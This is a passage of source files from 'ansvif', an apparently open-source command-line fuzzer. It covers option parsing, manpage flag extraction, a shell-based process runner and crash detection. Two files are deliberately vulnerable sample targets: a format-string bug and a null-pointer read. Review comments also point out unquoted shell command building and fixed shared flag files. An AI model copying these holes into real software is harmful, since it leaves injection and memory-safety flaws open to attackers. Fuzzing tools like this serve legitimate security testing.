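    case 'a':
      oxagast();
      break;
    case 'c':
      options.path_str = optarg;
      break;
    case 'b':
      buf_size = optarg;
      break;
    case 'e':
      options.spec_env =
          get_flags_template(optarg, debugo.verbose, debugo.debug);
      break;
    case 'p':
      man_loc = optarg;
      break;
    case 'm':
      man_page = optarg;
      break;
    case 'f':
      num_threads = optarg;
      break;
    case 'o':
      options.write_file_n = optarg;
      break;
    case 'h':
      help_me(argv[0]);
      break;
    case 'r':
      options.rand_all = true;
      break;
    case 'z':
      buffercontrol.rand_buf = true;
      break;
    case 's':
      options.u_strip_shell = optarg;
      break;
    case 'x':
      options.opt_other = get_other(optarg, debugo.verbose, debugo.debug);
      break;
    case 'D':
      debugo.dump_opts = true;
      break;
    case 'S':
      options.other_sep = optarg;
      break;
    case 'L':
      options.low_lvl_user = optarg;
      break;
    case 'F':
      options.junk_file_of_args = optarg;
      break;
    case 'A':
      options.always_arg_after = optarg;
      break;
    case 'B':
      options.always_arg_before = optarg;
      break;
    case 'n':
      options.never_rand = true;
      break;
    case 'R':
      runcoms.run_command = optarg;
      break;
    case 'W':
      options.t_timeout = optarg;
      break;
    case 'C':
      options.fault_code = optarg;
      break;
    case 'V':
      options.valgrind = true;
      break;
    case '1':
      dontpassgo.single_try = true;
      break;
    case 'P':
      options.percent_sign = true;
      break;
    case 'M':
      options.static_args = toint(optarg, argv[0]);
      break;
    case 'y':
      buffercontrol.buf_size_int = 0;
      break;
    case 'K':
      dontpassgo.keep_going = true;
      break;
    case 'E':
      runcoms.before_command = optarg;
      break;
    case 'w':
      runcoms.write_pipe = true;
      break;
    case 'i':
      version();
      break;
    case '0':
      options.strip_shell = options.strip_shell + "\\x00";
      break;
    case 'N':
      runcoms.prog_name = optarg;
      break;
    default:
      help_me(argv[0]);
    }
  }
  /* remove a stale crash flag from an earlier run.
   * NOTE(review): the flag is a fixed name in a shared directory, so any
   * local user can create or remove it and thereby forge or hide a crash
   * result; a per-run directory would avoid that.
   */
#ifdef __ANDROID__
  if (file_exists("/sdcard/ansvif/ansvif.crashed") == true) {
    unlink("/sdcard/ansvif/ansvif.crashed");
  }
#endif
#ifdef __NOTANDROID__
  if (file_exists("/tmp/ansvif.crashed") == true) {
    unlink("/tmp/ansvif.crashed");
  }
#endif
  /* always strip a new line no matter what the user says.
   * NOTE(review): this assignment replaces strip_shell outright, so the
   * platform default set above and the "\\x00" appended by -0 are both
   * discarded; without -s only '>' and '\n' are stripped. The generated
   * data is later placed on an `sh -c` command line, so if dropping the
   * default metacharacter list is not intended, fuzz data reaches the
   * shell unfiltered on the operator's machine -- confirm.
   */
  options.strip_shell = options.u_strip_shell + ">\n";
  if ((man_page != "") && (template_file == "")) {
    /* because we're getting stuff from the manpage */
    options.opts =
        get_flags_man(man_page, man_loc, debugo.verbose,
                      debugo.debug, debugo.dump_opts);
  } else if ((man_page == "") && (template_file != "")) {
    /* we're getting stuff from a template */
    options.opts = get_flags_template(template_file, debugo.verbose,
                                      debugo.debug);
  } else if ((man_page != "") && (template_file != "")) {
    /* a manpage and a template are mutually exclusive */
    std::cerr << "Don't specifiy a manpage and template at the same time"
              << std::endl;
    help_me(argv[0]);
  } else if ((man_page == "") && (template_file == "")) {
    /* can't fuzz if we don't have a template or manpage as
     * a starting point, if you want nothing just touch a file
     * and use it as a template
     */
    std::cerr << "You didn't specy a manpage or template." << std::endl;
    help_me(argv[0]);
  }
  if (file_exists(options.path_str) == false) {
    /* if they didn't specify a command path then error out */
    std::cerr << "No command at path to fuzz..." << std::endl;
    help_me(argv[0]);
  }
  if ((options.junk_file_of_args != "") && (options.opt_other.size() != 0)) {
    /* this will fix the -F no -x bug */
    help_me(argv[0]);
  }
  /* -y (size 0) and -b are mutually exclusive */
  if ((buffercontrol.buf_size_int == 0) && (buf_size != "")) {
    help_me(argv[0]);
  }
  /* -b given: convert it, toint is handed argv[0] for its own reporting */
  if ((buffercontrol.buf_size_int == -1) && (buf_size != "")) {
    buffercontrol.buf_size_int = toint(buf_size, argv[0]);
  }
  /* neither -b nor -y was given */
  if (buffercontrol.buf_size_int == -1) {
    help_me(argv[0]);
  }
  if (buffercontrol.buf_size_int < 0) {
    std::cerr << "Buffer must be a positive integer." << std::endl;
    help_me(argv[0]);
  }
  /* thread count: default unless -f was given */
  int thread_count_int = thread_count_def;
  if (num_threads != "") {
    thread_count_int = toint(num_threads, argv[0]);
    if (thread_count_int < 1) {
      /* zero or negative would start no worker and exit 0 without
       * having fuzzed anything
       */
      std::cerr << "Thread count must be a positive integer." << std::endl;
      help_me(argv[0]);
    }
  }
  if (dontpassgo.single_try == false) {
    /* one match_seg worker per requested thread, each given its own copy
     * of the option structs
     */
    std::vector<std::thread> threads;
    for (int cur_thread = 1; cur_thread <= thread_count_int; ++cur_thread)
      threads.push_back(std::thread(match_seg, options, runcoms, dontpassgo,
                                    buffercontrol, debugo));
    for (auto &all_thread : threads)
      all_thread.join();
  }
  if (dontpassgo.single_try == true) {
    /* no threads or anything since we're only doing a single run */
    match_seg(options, runcoms, dontpassgo, buffercontrol, debugo);
  }
  /* exit cleanly! */
  exit(0);
}

--------------------------------------------------------------------------------
/src/man_read.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)
#ifdef __linux
#include "../include/gzstream/gzstream.h"
#endif
#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <regex>
#include <stdio.h>
#include <string>
#include <thread>
#include <unistd.h>
#include <vector>

std::string remove_chars(const std::string &source, const std::string &chars);
bool file_exists(const std::string &filen);

/*
 * get_flags_man: collect option flags from a gzipped manpage.
 *
 * Reads /usr/share/man/man<man_loc>/<man_page>.<man_loc>.gz line by line
 * and keeps what four roff patterns capture, sorted and de-duplicated.
 * With verbose the list is printed; with dump_opts it is printed and the
 * process exits 0. Exits 1 when the manpage file does not exist and on
 * platforms where this is not implemented. `debug` is not used here.
 *
 * NOTE(review): man_page and man_loc are pasted into the path as given,
 * so a value containing "../" selects a file outside /usr/share/man.
 */
std::vector<std::string> get_flags_man(std::string man_page,
                                       std::string man_loc, bool verbose,
                                       bool debug, bool dump_opts) {
#ifdef _WIN32
  /* just error out :( */
  std::cout << "Not implemented in Windows, sorry..." << std::endl;
  exit(1);
#endif
#ifdef __ANDROID__
  /* just error out :( */
  std::cout << "Not implemented on Android, sorry..." << std::endl;
  exit(1);
#endif
#if defined(__unix__)
  std::vector<std::string> opt_vec;
  /* put the filename back together */
  std::string filename =
      "/usr/share/man/man" + man_loc + "/" + man_page + "." + man_loc + ".gz";
  if (file_exists(filename) == true) {
    /* time for the gunzip! the stream takes the C string directly, so no
     * heap copy of the name is left behind
     */
    igzstream in(filename.c_str());
    std::string gzline;
    /* the four line shapes an option is recognised by */
    std::regex start_of_opt_1("^(\\.?\\\\?\\w{2} )*(\\\\?\\w{2} ?)*(:?\\.B "
                              ")*((?:(?:\\\\-)+\\w+)(?:\\\\-\\w+)*).*");
    std::smatch opt_part_1;
    std::regex start_of_opt_2("^\\.Op Fl (\\w+) Ar.*");
    std::smatch opt_part_2;
    std::regex start_of_opt_3("^\\\\fB(-\\w+)( \\\\fI.*)*.*\\\\fB.*");
    std::smatch opt_part_3;
    std::regex start_of_opt_4("^\\\\fB(-\\w+)\\\\fR");
    std::smatch opt_part_4;
    while (std::getline(in, gzline)) {
      if (std::regex_match(gzline, opt_part_1, start_of_opt_1)) {
        /* group 4 is the flag with roff-escaped dashes; drop the
         * backslashes
         */
        std::string opt_1 = opt_part_1[4];
        opt_vec.push_back(remove_chars(opt_1, "\\"));
      }
      if (std::regex_match(gzline, opt_part_2, start_of_opt_2)) {
        /* mdoc form gives the bare name, the dash is added here */
        std::string opt_2 = opt_part_2[1];
        opt_vec.push_back("-" + opt_2);
      }
      if (std::regex_match(gzline, opt_part_3, start_of_opt_3)) {
        std::string opt_3 = opt_part_3[1];
        opt_vec.push_back(opt_3);
      }
      if (std::regex_match(gzline, opt_part_4, start_of_opt_4)) {
        std::string opt_4 = opt_part_4[1];
        opt_vec.push_back(opt_4);
      }
    }
  } else {
    /* either they didn't have the right location or the command
     * doesn't have a manpage, either way, exit with error 1
     */
    std::cerr << "Could not find a manpage for that command..." << std::endl;
    exit(1);
  }
  /* sort them so that we can unique them correctly */
  std::sort(opt_vec.begin(), opt_vec.end());
  opt_vec.erase(std::unique(opt_vec.begin(), opt_vec.end()), opt_vec.end());
  if (verbose == true) {
    /* if we're being verbose then options used are listed */
    std::cout << "Options being used: " << std::endl;
    for (const std::string &found : opt_vec) {
      std::cout << found << " ";
    }
    std::cout << std::endl;
  }
  if (dump_opts == true) {
    /* -D: dump the options on STDOUT and be done with it */
    for (const std::string &found : opt_vec) {
      std::cout << " " << found << " " << std::endl;
    }
    std::cout << std::endl;
    exit(0);
  }
  /* return the options we've extracted out of the manpages */
  return (opt_vec);
#elif !defined(_WIN32)
  std::cout << "Not implemented on Unknown operating system, sorry..."
            << std::endl;
  exit(1);
#endif
}

--------------------------------------------------------------------------------
/src/null_pointer.c:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 *
 *
 * __ _ _ __ ___ __ ____ ____
 * / ( \/ )/ _\ / __)/ _\/ ___(_ _)
 * ( O ) (/ ( (_ / \___ \ )(
 * \__(_/\_\_/\_/\___\_/\_(____/(__)
 */

/* Reads through a null pointer on purpose; presumably a known-crashing
 * sample target for the fuzzer -- not a pattern to copy.
 */
int main() {
  /* this is bad, i'm calling on a null pointer */
  char *assigned_null = 0;
  int null_pointer = *assigned_null;
}

--------------------------------------------------------------------------------
/src/oxagast.cpp:
--------------------------------------------------------------------------------
#include <cstdlib>
#include <iostream>
/* the ASCII-art project banner, stored as hex escapes */
static const char o[] =
    "\x0A\x20\x20\x20\x5F\x5F\x20\x5F\x20\x20\x5F\x20\x20\x5F\x5F"
    "\x20\x20\x20\x5F\x5F\x5F\x20\x20\x5F\x5F\x20\x20\x5F\x5F\x5F"
    "\x5F\x20\x5F\x5F\x5F\x5F\x20\x0A\x20\x20\x2F\x20\x20\x28\x20"
    "\x5C\x2F\x20\x29\x2F\x20\x5F\x5C\x20\x2F\x20\x5F\x5F\x29\x2F"
    "\x20\x5F\x5C\x2F\x20\x5F\x5F\x5F\x28\x5F\x20\x20\x5F\x29\x20"
    "\x0A\x20\x28\x20\x20\x4F\x20\x29\x20\x20\x28\x2F\x20\x20\x20"
    "\x20\x28\x20\x28\x5F\x20\x2F\x20\x20\x20\x20\x5C\x5F\x5F\x5F"
    "\x20\x5C\x20\x29\x28\x20\x0A\x20\x20\x5C\x5F\x5F\x28\x5F\x2F"
    "\x5C\x5F\x5C\x5F\x2F\x5C\x5F\x2F\x5C\x5F\x5F\x5F\x5C\x5F\x2F"
    "\x5C\x5F\x28\x5F\x5F\x5F\x5F\x2F\x28\x5F\x5F\x29\x20\x0A\x0A";
/* -a: print the banner and exit */
void oxagast() {
  std::cout << o;
  exit(0);
}

--------------------------------------------------------------------------------
/src/popen2.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/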
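___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cerrno>
#include <cstdio>
#include <cstdlib>
#include <iomanip>
#include <string>
#include <sys/stat.h>
#ifdef __unix__
#include <sys/wait.h>
#endif
#include <thread>
#include <unistd.h>
#ifdef __FREEBSD
#include <cstdio>
#include <errno.h>
#include <stdlib.h>
#endif

#define READ 0
#define WRITE 1

/*
 * popen2: run `command` through the shell and return a stream connected
 * to it, reporting the child's pid through `pid`.
 *
 * type "r" connects the child's stdout to the returned read stream; any
 * other value connects the returned write stream to the child's stdin.
 * On unix builds with __NOTANDROID__, a root caller runs the command via
 * /bin/su with low_lvl_user on the argument list instead of directly.
 * Exits the whole program if pipe() or fork() fails. On Windows the
 * command goes to _popen in "rt" mode and `pid` is left untouched.
 *
 * NOTE(review): `command` is interpreted by sh, so everything placed in
 * it (target path, fixed arguments, fuzz data) is subject to shell
 * expansion; the caller is responsible for what it lets through.
 */
FILE *popen2(std::string command, std::string type, int &pid,
             std::string low_lvl_user) {
#ifdef __unix__
  int fd[2];
  if (pipe(fd) == -1) {
    /* without a pipe the fdopen below would wrap garbage descriptors */
    perror("pipe");
    exit(1);
  }
  pid_t child_pid = fork();
  if (child_pid == -1) {
    perror("fork");
    exit(1);
  }
  /* here the child begins */
  if (child_pid == 0) {
    if (type == "r") {
      /* child writes: its stdout becomes the pipe's write end */
      close(fd[READ]);
      dup2(fd[WRITE], 1);
    } else {
      /* child reads: its stdin becomes the pipe's read end */
      close(fd[WRITE]);
      dup2(fd[READ], 0);
    }
#ifdef __NOTANDROID__
    if (getuid() == 0) {
      /* if we're root we're going to drop our privs
       * this fixes not being able to reap processes that
       * are suid
       */
      execl("/bin/su", "su", "-c", "/bin/sh", "-c", command.c_str(),
            low_lvl_user.c_str(), NULL);
    } else {
      /* or just run it like we normally would */
      execl("/bin/sh", "sh", "-c", command.c_str(), NULL);
    }
#endif
#ifdef __ANDROID__
    execl("/system/bin/sh", "sh", "-c", command.c_str(), NULL);
#endif
    /* only reached when no exec happened. Without this the child would
     * return into the caller and carry on as a second copy of the fuzzer
     */
    perror("exec");
    _exit(127);
  }
  /* parent: keep only the end we hand back */
  if (type == "r") {
    close(fd[WRITE]);
  } else {
    close(fd[READ]);
  }
  pid = child_pid;
  if (type == "r") {
    return fdopen(fd[READ], "r");
  }
  return fdopen(fd[WRITE], "w");
#endif
#ifdef _WIN32
  /* open the command's output with the read text attribute so that we
   * can read it like a text file; NULL on failure
   */
  FILE *process_pipe = _popen(command.c_str(), "rt");
  return (process_pipe);
#endif
}

/*
 * pclose2: close a stream from popen2 and collect the child, so finished
 * targets do not pile up.
 *
 * On unix returns the wait status filled in by waitpid, or -1 if waitpid
 * fails for a reason other than an interrupted call. On Windows calls
 * _pclose only when the stream is at end of file and always returns -1.
 */
int pclose2(FILE *fp, pid_t pid) {
#ifdef __unix__
  int stat = -1;
  fclose(fp);
  /* waitpid reports failure as -1; retry only when a signal cut it short */
  while (waitpid(pid, &stat, 0) == -1) {
    if (errno != EINTR) {
      stat = -1;
      break;
    }
  }
  return stat;
#endif
#ifdef _WIN32
  if (feof(fp)) {
    _pclose(fp);
  }
  return -1;
#endif
}

--------------------------------------------------------------------------------
/src/randomizer.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cstdlib>
#include <functional>
#include <random>

/*
 * rand_me_plz: return a random integer in [rand_from, rand_to].
 *
 * unix: a default_random_engine seeded from random_device on every call.
 * Windows: rand() reduced to the width of the range. The caller must pass
 * rand_from <= rand_to. Suitable for picking fuzz data, not for secrets.
 */
int rand_me_plz(int rand_from, int rand_to) {
#ifdef _WIN32
  int span = rand_to - (rand_from - 1);
  /* offset is added: subtracting it put every result below rand_from */
  int rolled = rand() % span + rand_from;
#endif
#ifdef __unix__
  std::random_device rd;
  std::default_random_engine generator(rd()); // seed random
  std::uniform_int_distribution<int> distribution(rand_from, rand_to);
  int rolled = distribution(generator);
#endif
  return (rolled);
}

--------------------------------------------------------------------------------
/src/reaper.cpp:
--------------------------------------------------------------------------------
#include <string>
#include <signal.h>
#include <cstdlib>
#include <unistd.h>

/*
 * reaper: wait t_timeout seconds, then terminate process `grim`.
 *
 * unix: sends SIGTERM (the original passed the literal 15) and, when
 * just_kill_me is non-empty (-N), also runs `pkill <just_kill_me>` and
 * returns system()'s result; otherwise returns 0. Windows returns 1,
 * other platforms 0.
 *
 * NOTE(review): just_kill_me is appended to a command line that system()
 * hands to sh, so shell metacharacters in the -N value are interpreted.
 * Running pkill through fork/exec with the name as a single argument
 * would remove the shell from the path.
 */
int reaper(int grim, int t_timeout, std::string just_kill_me) {
#ifdef __unix__
  sleep(t_timeout);
  /* kill() treats 0 and negative pids as "a whole process group" or
   * "every process we may signal"; only ever signal a real child pid
   */
  if (grim > 0) {
    kill(grim, SIGTERM);
  }
  int ret = 0;
  /* if the above doesn't work, we can fall back to piggybacking pkill
   * if they use -N
   */
  if (just_kill_me != "") {
    just_kill_me = "pkill " + just_kill_me;
    ret = system(just_kill_me.c_str());
  }
  return (ret);
#elif _WIN32
  /* no signal-based kill on windows */
  return (1);
#else
  return (0);
#endif
}

--------------------------------------------------------------------------------
/src/remove_chars.cpp:
--------------------------------------------------------------------------------
#include <cstdlib>
#include <string>
#include <unistd.h>

/* Return `source` with every character that occurs in `chars` removed. */
std::string remove_chars(const std::string &source, const std::string &chars) {
  std::string result;
  for (char candidate : source) {
    /* keep it only if it is not in the removal list */
    if (chars.find(candidate) == std::string::npos) {
      result += candidate;
    }
  }
  return (result);
}

/* Count the single-quote characters in `s`. */
int count_quotes(std::string s) {
  unsigned int count = 0;
  for (char candidate : s) {
    if (candidate == '\'') count++;
  }
  return count;
}

--------------------------------------------------------------------------------
/src/string_format.c:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 *
 *
 * __ _ _ __ ___ __ ____ ____
 * / ( \/ )/ _\ / __)/ _\/ ___(_ _)
 * ( O ) (/ ( (_ / \___ \ )(
 * \__(_/\_\_/\_/\___\_/\_(____/(__)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Passes argv[1] to snprintf as the format string, so conversion
 * specifiers in the argument are interpreted; presumably a deliberately
 * vulnerable sample target for the fuzzer, like its neighbours. Real code
 * uses snprintf(buffer, sizeof(buffer), "%s", argv[1]) and checks argc
 * first (argv[1] is NULL when no argument is given).
 */
int main(int argc, char **argv) {
  char buffer[64];
  int x = 1;
  snprintf(buffer, sizeof(buffer), argv[1]);
  buffer[sizeof(buffer) - 1] = 0;
  int howmuch = strlen(buffer);
  printf("Buffer:(%d) \nData:%s\n", howmuch, buffer);
  return 0;
}

--------------------------------------------------------------------------------
/src/sys_string.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cstdlib>
#include <string>
#include <unistd.h>
#include <vector>

std::string binstr_to_hex(std::string bin_str);
std::string binstr_to_hex_pc(std::string bin_str_pc);

#ifndef _WIN32
/*
 * Shell tail appended to every generated command: capture $?, and when it
 * is 132, 134, 135, 136, 139 or 159 (128 + the number of SIGILL, SIGABRT,
 * SIGBUS, SIGFPE, SIGSEGV, SIGSYS on Linux) print "CRASHCODE <n>" and
 * touch flag_file.
 *
 * NOTE(review): the flag files used below have fixed names in shared
 * directories, so another local user can create or delete them; when the
 * fuzzer runs as root, `touch` also follows a symlink planted at that
 * name.
 */
static std::string crash_check(const std::string &flag_file) {
  return "; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC "
         "-eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; "
         "touch " + flag_file + "; fi";
}
#endif

/*
 * get_out_str: build the command line that is actually executed.
 *
 * Joins the environment string, valgrind prefix, before-command, target
 * path, fixed arguments and fuzz data, then appends output redirection
 * (to /dev/null, or to <log_prefix>.output.ansvif.log when log_prefix is
 * set) and the crash check. With pipe_write the fuzz data is also echoed
 * into the target's stdin. Returns out_str; the printf-style out_str_p is
 * still assembled here but not returned (get_out_str_pc returns that
 * form).
 *
 * NOTE(review): every piece is concatenated unquoted into a string meant
 * for `sh -c`. That is how the fuzz data reaches the target, and it also
 * means anything the strip list lets through is interpreted by the shell.
 */
std::string get_out_str(std::string env_str, std::string valgrind_str, std::string sys_str,
                        std::string path_str, std::string always_arg_b,
                        std::string always_arg, std::string fuzz_after,
                        std::string log_prefix, std::string before_command, bool pipe_write, bool verbose) {
  std::string out_str, out_str_p;
  /* no shooting blanks plz */
#ifdef __NOTANDROID__
  if (sys_str != "") {
    if (env_str != "") {
      out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " +
                  valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(sys_str) + "\") " +
                  always_arg + fuzz_after;
    }
    if (env_str == "") { // if we have no environment string
      out_str_p = valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(sys_str) + "\") " +
                  always_arg + " $(printf \"" + binstr_to_hex(fuzz_after) +
                  "\") ";
    }
    if (pipe_write == true) {
      out_str = env_str + " " + valgrind_str + " (echo " + fuzz_after + " && cat) | " + path_str + " " + always_arg_b + sys_str + " " + always_arg + fuzz_after;
    }
    else {
      out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " + always_arg_b + sys_str + " " + always_arg + fuzz_after;
    }
  }
  if (log_prefix == "") {
    /* not logging here */
    if (verbose == true) {
      out_str = out_str + crash_check("/tmp/ansvif.crashed");
    }
    if (verbose == false) {
      out_str = out_str + " >/dev/null 2>&1" + crash_check("/tmp/ansvif.crashed");
    }
  } else {
    /* logging here */
    out_str = out_str + " >" + log_prefix +
              ".output.ansvif.log 2>&1" + crash_check("/tmp/ansvif.crashed");
  }
#endif
#ifdef __ANDROID__
  if (sys_str != "") {
    if (env_str != "") {
      out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " +
                  valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(sys_str) + "\") " +
                  always_arg + fuzz_after;
    }
    if (env_str == "") { // if we have no environment string
      out_str_p = valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(sys_str) + "\") " +
                  always_arg + " $(printf \"" + binstr_to_hex(fuzz_after) +
                  "\") ";
    }
    out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " +
              always_arg_b + sys_str + " " + always_arg + fuzz_after;
  }
  if (log_prefix == "") {
    /* not logging here */
    out_str = out_str + " >/dev/null 2>&1" + crash_check("/sdcard/ansvif/ansvif.crashed");
  } else {
    /* logging here */
    out_str = out_str + " >" + log_prefix +
              ".output.ansvif.log 2>&1" + crash_check("/sdcard/ansvif/ansvif.crashed");
  }
#endif
#ifdef _WIN32
  if (env_str != "") {
    out_str_p = " (.\\printf.exe \\x" + binstr_to_hex(env_str) + "\") " +
                "'" + path_str + "' (.\\printf.exe \\x" +
                binstr_to_hex(sys_str) + ")" + always_arg + " " + fuzz_after +
                " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode";
  }
  if (env_str == "") {
    out_str_p = "'" + path_str + "' (.\\printf.exe \\x" +
                binstr_to_hex(sys_str) + ") " + always_arg + " " +
                fuzz_after + " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode";
  }
  out_str = "cmd /c powershell -c " + env_str + "Start-Process -FilePath '" + path_str + "'" +
            " -ArgumentList " + always_arg_b + " " + sys_str + " " + always_arg + " " +
            fuzz_after + " > " + log_prefix + ".output.ansvif.log -PassThru; echo $LastExitCode";
#endif
  return (out_str);
}

/*
 * get_out_str_pc: build the printf-style replay command for the
 * percent-encoded mode (fuzz data passed through binstr_to_hex_pc).
 *
 * Assembles the same two strings as get_out_str but returns out_str_p,
 * the form in which the fuzz data is wrapped in $(printf "...") so a
 * crash can be replayed from a log. out_str is still built, including its
 * redirection and crash check, but is not returned; write_pipe and
 * verbose are not used here.
 */
std::string
get_out_str_pc(std::string env_str, std::string valgrind_str,
               std::string sys_str, std::string path_str,
               std::string always_arg_b, std::string always_arg,
               std::string fuzz_after, std::string log_prefix, std::string before_command, bool write_pipe, bool verbose) {
  std::string out_str, out_str_p;
  /* make sure we're not shooting blanks */
#ifdef __NOTANDROID__
  if (sys_str != "") {
    if (env_str != "") {
      /* this is if we have an environment string */
      out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " +
                  valgrind_str + " " + path_str + " $(printf \"" +
                  binstr_to_hex(binstr_to_hex_pc(sys_str)) + "\") " +
                  always_arg + binstr_to_hex(binstr_to_hex_pc(fuzz_after));
    }
    if (env_str == "") {
      /* and if we don't have environment variables to fuzz */
      out_str_p = valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(binstr_to_hex_pc(sys_str)) +
                  "\") " + always_arg + " $(printf \"" +
                  binstr_to_hex(binstr_to_hex_pc(fuzz_after)) + "\") ";
    }
    out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " +
              always_arg_b + binstr_to_hex_pc(sys_str) + " " + always_arg +
              binstr_to_hex_pc(fuzz_after);
  }
  if (log_prefix == "") {
    /* not logging: discard the target's output */
    out_str = out_str + " >/dev/null 2>&1" + crash_check("/tmp/ansvif.crashed");
  } else {
    /* get the signal here and log */
    out_str = out_str + " >" + log_prefix + ".output.ansvif.log 2>&1" + crash_check("/tmp/ansvif.crashed");
  }
#endif
#ifdef __ANDROID__
  if (sys_str != "") {
    if (env_str != "") {
      /* this is if we have an environment string */
      out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " +
                  valgrind_str + " " + path_str + " $(printf \"" +
                  binstr_to_hex(binstr_to_hex_pc(sys_str)) + "\") " +
                  always_arg + binstr_to_hex(binstr_to_hex_pc(fuzz_after));
    }
    if (env_str == "") {
      /* and if we don't have environment variables to fuzz */
      out_str_p = valgrind_str + " " + path_str + " " + always_arg_b +
                  " $(printf \"" + binstr_to_hex(binstr_to_hex_pc(sys_str)) +
                  "\") " + always_arg + " $(printf \"" +
                  binstr_to_hex(binstr_to_hex_pc(fuzz_after)) + "\") ";
    }
    out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " +
              always_arg_b + binstr_to_hex_pc(sys_str) + " " + always_arg +
              binstr_to_hex_pc(fuzz_after);
  }
  if (log_prefix == "") {
    /* not logging: discard the target's output */
    out_str = out_str + " >/dev/null 2>&1" + crash_check("/sdcard/ansvif/ansvif.crashed");
  } else {
    /* get the signal here and log */
    out_str = out_str + " >" + log_prefix + ".output.ansvif.log 2>&1" + crash_check("/sdcard/ansvif/ansvif.crashed");
  }
#endif
#ifdef _WIN32
  if (env_str != "") {
    out_str_p = " (.\\printf.exe \\x" + binstr_to_hex(env_str) + "\") " +
                "'" + path_str + "' (.\\printf.exe \\x" +
                binstr_to_hex(sys_str) + ")" + always_arg + " " + fuzz_after +
                " > " + log_prefix + ".output.ansvif.log; echo $LastExitCode}); echo $LastExitCode";
  }
  if (env_str == "") {
    out_str_p = "'" + path_str + "' (.\\printf.exe \\x" +
                binstr_to_hex(sys_str) + ") " + always_arg + " " +
                fuzz_after + " > " + log_prefix + ".output.ansvif.log; echo $LastExitCode}); echo $LastExitCode";
  }
  out_str = "powershell -c " + env_str + "(Start-Job {& '" + path_str + "' " +
            always_arg_b + " " + sys_str + " " + always_arg + " " +
            fuzz_after + " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode";
#endif
  return (out_str_p);
}

--------------------------------------------------------------------------------
/src/templates.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cstdlib>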
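#include <fstream>
#include <iostream>
#include <random>
#include <regex>
#include <stdio.h>
#include <unistd.h>
#include <vector>

std::vector<std::string> get_flags_man(std::string man_page,
                                       std::string man_loc, bool verbose,
                                       bool debug, bool dump_opts);
int rand_me_plz(int rand_from, int rand_to);
void help_me(std::string mr_me);

std::vector<std::string> get_flags_template(std::string filename, bool verbose,
                                            bool debug) {
  /* Read the template file and return one option per line.
   * verbose and debug are accepted but not used here.
   * If the file cannot be opened, an error is printed, help_me() is
   * called and the (empty) vector is returned.
   */
  std::vector<std::string> opt_vec;
  std::ifstream template_file(filename);
  if (!template_file.is_open()) {
    std::cerr << "Could not open template file..." << std::endl;
    help_me("ansvif");
    return (opt_vec);
  }
  for (std::string line; std::getline(template_file, line);) {
    opt_vec.push_back(line);
  }
  template_file.close();
  return (opt_vec);
}

std::vector<std::string> get_other(std::string filename, bool verbose,
                                   bool debug) {
  /* Same as get_flags_template: one vector entry per line of the file,
   * with the same error message and help_me() call when it cannot be
   * opened.
   */
  std::vector<std::string> other_vec;
  std::ifstream other_file(filename);
  if (!other_file.is_open()) {
    std::cerr << "Could not open template file..." << std::endl;
    help_me("ansvif");
    return (other_vec);
  }
  for (std::string line; std::getline(other_file, line);) {
    other_vec.push_back(line);
  }
  other_file.close();
  return (other_vec);
}
--------------------------------------------------------------------------------
/src/to_int.cpp:
--------------------------------------------------------------------------------
#include <string>
#include <cstdlib>
#include <fstream>
#include <iostream>
#ifdef __unix
#include "version.h"
#endif
#ifdef _WIN32
#include "version.h"
#endif
#include <sstream>

void help_me(std::string mr_me);

int toint(std::string ints, std::string my_prog) {
  /* Convert a command line value to int.
   * The stream extraction is the validation step: help_me(my_prog) is
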